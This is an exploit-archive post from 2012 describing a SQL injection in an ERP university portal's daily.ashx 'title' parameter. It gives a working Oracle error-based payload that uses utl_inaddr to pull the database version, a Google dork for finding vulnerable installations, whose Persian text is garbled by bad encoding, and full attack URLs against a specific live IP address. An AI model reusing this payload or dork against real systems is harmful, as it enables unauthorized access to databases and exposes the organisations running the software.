Home / exploits Enterprise Resource Planning SQL Injection
Posted on 31 December 2012
# Exploit Author: Shahram Darvishvand [karaji_kt21] <darvishvand.shahram[at]gmail[dot]com> # Exploit Title: [erp (Enterprise Resource plannin) SQL Injection Vulnerability ] # Vendor : sida university system # Date: [4/May/2012] # Google Dork: "Ù†رÙÂ… اÙÂØ²Ø§Ø± جاÙ…ع erp شاÙÂ…Ù„ قواÙ†ÛŒن Ú©Ù¾ÛÂŒ راÛŒت ÙÂ…ÛÂŒ باشد Ùˆ نوع Ù†سخÙ‡ بتا ÙÂ…ÛÂŒ باشد" # Version: [ 1389/09/17 ] # Tested on: [ASHX .. Application powered by Oracle DBMS] ============================================================ ** This Vulnerability Is On version 1389/09/17 ** -------------------------------------------- Exploit : http://[IP Or Domain]/Portal/WUC/daily.ashx?title= ============================================================= Example : http://[IP Or Domain]/Portal/WUC/daily.ashx?title= 'or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))-- Response : Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit ========================================================== [+] Greetz : Fahime.Saveh , Behrooz_Ice ******************************** For Screen shot 1 : http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))-- For Screen Shot 2 : http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--
